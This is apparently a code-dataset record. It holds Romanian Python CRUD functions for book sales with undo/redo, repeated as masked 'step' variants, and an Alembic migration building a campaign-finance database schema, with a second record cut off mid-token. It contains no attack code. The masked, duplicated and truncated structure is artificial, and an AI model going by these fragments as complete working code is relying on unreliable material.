adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-2": "<mask token>\n\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\n<mask token>\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param 
lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-3": "<mask token>\n\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\ndef update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):\n \"\"\"\n Actualizeaza o vanzare.\n :param 
lst_vanzari: lista de vaznari\n :param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.\n :param undo_list: lista cu vanzarea care tebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista cu vanzari actualizata\n \"\"\"\n if read(lst_vanzari, get_id(new_vanzare)) is None:\n raise ValueError(\n f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'\n )\n new_vanzari = []\n for vanzare in lst_vanzari:\n if get_id(vanzare) != get_id(new_vanzare):\n new_vanzari.append(vanzare)\n else:\n new_vanzari.append(new_vanzare)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return new_vanzari\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-4": "from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere\n\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\ndef update(lst_vanzari, 
new_vanzare, undo_list: list, redo_list: list):\n \"\"\"\n Actualizeaza o vanzare.\n :param lst_vanzari: lista de vaznari\n :param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.\n :param undo_list: lista cu vanzarea care tebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista cu vanzari actualizata\n \"\"\"\n if read(lst_vanzari, get_id(new_vanzare)) is None:\n raise ValueError(\n f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'\n )\n new_vanzari = []\n for vanzare in lst_vanzari:\n if get_id(vanzare) != get_id(new_vanzare):\n new_vanzari.append(vanzare)\n else:\n new_vanzari.append(new_vanzare)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return new_vanzari\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(\n f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n",
"step-5": "from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere\n\ndef inverse_create(lst_vanzari, id_carte):\n new_vanzari = []\n for carte in lst_vanzari:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n return new_vanzari\n\n\ndef get_by_id(id, lista):\n '''\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n '''\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere, undo_list: list, redo_list: list):\n '''\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n '''\n new_list=['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)\n #lst_vanzari.append(vanzare_obiecte)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n #return [id_vanzare, titlu, gen, pret, tip_reducere]\n return lst_vanzari + [vanzare_obiecte]\n\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n\n if 
cartea_cu_id:\n return cartea_cu_id\n return None\n\n\ndef update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):\n \"\"\"\n Actualizeaza o vanzare.\n :param lst_vanzari: lista de vaznari\n :param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.\n :param undo_list: lista cu vanzarea care tebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista cu vanzari actualizata\n \"\"\"\n\n if read(lst_vanzari, get_id(new_vanzare)) is None:\n raise ValueError(f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.')\n\n # lst_carti=[c1:(1,Mobidic), c2:(2,Hansel si Gretel)], cartea=(2, Scufita Rosie)\n new_vanzari = []\n for vanzare in lst_vanzari:\n if get_id(vanzare) != get_id(new_vanzare):\n new_vanzari.append(vanzare)\n else:\n new_vanzari.append(new_vanzare)\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return new_vanzari\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie adaugata\n :return: o lista de vanzari fara cartea cu id-ul id_carte.\n \"\"\"\n if read(lst_vanzare, id_carte) is None:\n raise ValueError(f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')\n\n new_vanzari = []\n for carte in lst_vanzare:\n if get_id(carte) != id_carte:\n new_vanzari.append(carte)\n undo_list.append(lst_vanzare)\n redo_list.clear()\n return new_vanzari\n\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Initial migration
Revision ID: 1f2296edbc75
Revises: 7417382a3f1
Create Date: 2014-01-19 23:04:58.877817
"""
# revision identifiers, used by Alembic.
revision = '1f2296edbc75'  # unique id of this migration
down_revision = '7417382a3f1'  # parent revision this migration builds on
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from sqlalchemy import func
def upgrade():
    """Build the initial schema.

    Creation order respects foreign-key dependencies: standalone tables
    first, then the tables that reference them, and finally association
    tables; an index is created for every foreign-key column.  Every
    table shares the same audit columns: a server-generated UUID primary
    key plus created/updated timestamps defaulted server-side.
    """
    ### commands auto generated by Alembic - please adjust! ###
    # NOTE(review): the uuid_generate_v4() server default needs the
    # PostgreSQL "uuid-ossp" extension — confirm it is enabled before
    # this migration runs.
    # --- standalone tables (no foreign keys of their own) ---
    op.create_table(u'consultant',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('name', sa.Text(), nullable=False),
    sa.Column('address', sa.Text(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table(u'service',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('name', sa.Text(), nullable=False),
    sa.Column('description', sa.Text(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    # NOTE(review): Numeric(precision=2, scale=2) can only hold values
    # strictly below 1.00, so a 100% requirement would overflow — confirm
    # the intended range of percent_required.
    op.create_table(u'ballot_type',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('name', sa.Text(), nullable=False),
    sa.Column('percent_required', sa.Numeric(precision=2, scale=2), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table(u'employer',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('name', sa.Text(), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table(u'tag',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('name', sa.Text(), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table(u'election',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('date', sa.Date(), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    # --- first-level dependents ---
    # donor -> employer; a donor is unique by name plus geocoded position.
    op.create_table(u'donor',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('first_name', sa.Text(), nullable=False),
    sa.Column('last_name', sa.Text(), nullable=False),
    sa.Column('address', sa.Text(), nullable=False),
    sa.Column('latitude', sa.Float(), nullable=False),
    sa.Column('longitude', sa.Float(), nullable=False),
    sa.Column('employer_id', postgresql.UUID(), nullable=True),
    sa.ForeignKeyConstraint(['employer_id'], [u'employer.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('first_name','last_name','latitude','longitude')
    )
    op.create_index('ix_donor_employer_id', 'donor', ['employer_id'], unique=False)
    # committee -> election
    op.create_table(u'committee',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('name', sa.Text(), nullable=False),
    sa.Column('filer_id', sa.Text(), nullable=True),
    sa.Column('sponsor', sa.Text(), nullable=True),
    sa.Column('election_id', postgresql.UUID(), nullable=True),
    sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index('ix_committee_election_id', 'committee', ['election_id'], unique=False)
    # ballot_measure -> ballot_type, election; also carries vote totals.
    op.create_table(u'ballot_measure',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('name', sa.Text(), nullable=True),
    sa.Column('prop_id', sa.Text(), nullable=False),
    sa.Column('description', sa.Text(), nullable=True),
    sa.Column('num_yes', sa.Integer(), nullable=True),
    sa.Column('num_no', sa.Integer(), nullable=True),
    sa.Column('passed', sa.Boolean(), nullable=True),
    sa.Column('ballot_type_id', postgresql.UUID(), nullable=True),
    sa.Column('election_id', postgresql.UUID(), nullable=True),
    sa.ForeignKeyConstraint(['ballot_type_id'], [u'ballot_type.id'], ),
    sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index('ix_ballot_measure_election_id', 'ballot_measure', ['election_id'], unique=False)
    op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', ['ballot_type_id'], unique=False)
    # --- second-level dependents ---
    # donation -> donor, committee
    op.create_table(u'donation',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('amount', sa.Float(), nullable=False),
    sa.Column('transaction_date', sa.Date(), nullable=False),
    sa.Column('donor_id', postgresql.UUID(), nullable=False),
    sa.Column('committee_id', postgresql.UUID(), nullable=False),
    sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),
    sa.ForeignKeyConstraint(['donor_id'], [u'donor.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index('ix_donation_committee_id', 'donation', ['committee_id'], unique=False)
    op.create_index('ix_donation_donor_id', 'donation', ['donor_id'], unique=False)
    # contract -> consultant, service, committee
    op.create_table(u'contract',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('payment', sa.Float(), nullable=False),
    sa.Column('consultant_id', postgresql.UUID(), nullable=False),
    sa.Column('service_id', postgresql.UUID(), nullable=True),
    sa.Column('description', sa.Text(), nullable=True),
    sa.Column('committee_id', postgresql.UUID(), nullable=False),
    sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),
    sa.ForeignKeyConstraint(['consultant_id'], [u'consultant.id'], ),
    sa.ForeignKeyConstraint(['service_id'], [u'service.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index('ix_contract_consultant_id', 'contract', ['consultant_id'], unique=False)
    op.create_index('ix_contract_service_id', 'contract', ['service_id'], unique=False)
    op.create_index('ix_contract_committee_id', 'contract', ['committee_id'], unique=False)
    # stance: one row per (committee, ballot_measure) pair, enforced by
    # the unique constraint below.
    op.create_table(u'stance',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('voted_yes', sa.Boolean(), nullable=False),
    sa.Column('committee_id', postgresql.UUID(), nullable=False),
    sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),
    sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),
    sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('committee_id','ballot_measure_id')
    )
    op.create_index('ix_stance_ballot_measure_id', 'stance', ['ballot_measure_id'], unique=False)
    op.create_index('ix_stance_committee_id', 'stance', ['committee_id'], unique=False)
    # ballot_measure_tags: many-to-many join between ballot_measure and tag.
    op.create_table(u'ballot_measure_tags',
    sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),
    sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),
    sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),
    sa.Column('tag_id', postgresql.UUID(), nullable=False),
    sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),
    sa.ForeignKeyConstraint(['tag_id'], [u'tag.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('ballot_measure_id','tag_id')
    )
    op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags', ['tag_id'], unique=False)
    op.create_index('ix_ballot_measure_tags_ballot_measure_id', 'ballot_measure_tags', ['ballot_measure_id'], unique=False)
    ### end Alembic commands ###
def downgrade():
    """Drop every index and table created by upgrade(), in reverse order."""
    ### commands auto generated by Alembic - please adjust! ###
    # Each entry pairs a table with the indexes that must go first; the
    # sequence is the exact reverse of the creation order in upgrade(),
    # so foreign-key dependents disappear before the tables they reference.
    teardown = [
        (u'ballot_measure_tags', ['ix_ballot_measure_tags_ballot_measure_id',
                                  'ix_ballot_measure_tags_tag_id']),
        (u'stance', ['ix_stance_committee_id', 'ix_stance_ballot_measure_id']),
        (u'contract', ['ix_contract_committee_id', 'ix_contract_service_id',
                       'ix_contract_consultant_id']),
        (u'donation', ['ix_donation_donor_id', 'ix_donation_committee_id']),
        (u'ballot_measure', ['ix_ballot_measure_ballot_type_id',
                             'ix_ballot_measure_election_id']),
        (u'committee', ['ix_committee_election_id']),
        (u'donor', ['ix_donor_employer_id']),
        (u'election', []),
        (u'tag', []),
        (u'employer', []),
        (u'ballot_type', []),
        (u'service', []),
        (u'consultant', []),
    ]
    for table, indexes in teardown:
        for index in indexes:
            op.drop_index(index, table)
        op.drop_table(table)
    ### end Alembic commands ###
|
normal
|
{
"blob_id": "7df55853d0f4f1bf56512c4427d7f91e9c1f2279",
"index": 6524,
"step-1": "<mask token>\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.create_table(u'consultant', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('address', sa.Text(), nullable=\n True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'service', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('description', sa.Text(),\n nullable=True), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'ballot_type', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('percent_required', sa.Numeric(\n precision=2, scale=2), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'employer', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'tag', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', 
sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'election', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('date', sa.\n Date(), nullable=False), sa.PrimaryKeyConstraint('id'))\n op.create_table(u'donor', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('first_name',\n sa.Text(), nullable=False), sa.Column('last_name', sa.Text(),\n nullable=False), sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False), sa.Column(\n 'longitude', sa.Float(), nullable=False), sa.Column('employer_id',\n postgresql.UUID(), nullable=True), sa.ForeignKeyConstraint([\n 'employer_id'], [u'employer.id']), sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name', 'last_name', 'latitude', 'longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'],\n unique=False)\n op.create_table(u'committee', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('name', sa.\n Text(), nullable=False), sa.Column('filer_id', sa.Text(), nullable=\n True), sa.Column('sponsor', sa.Text(), 
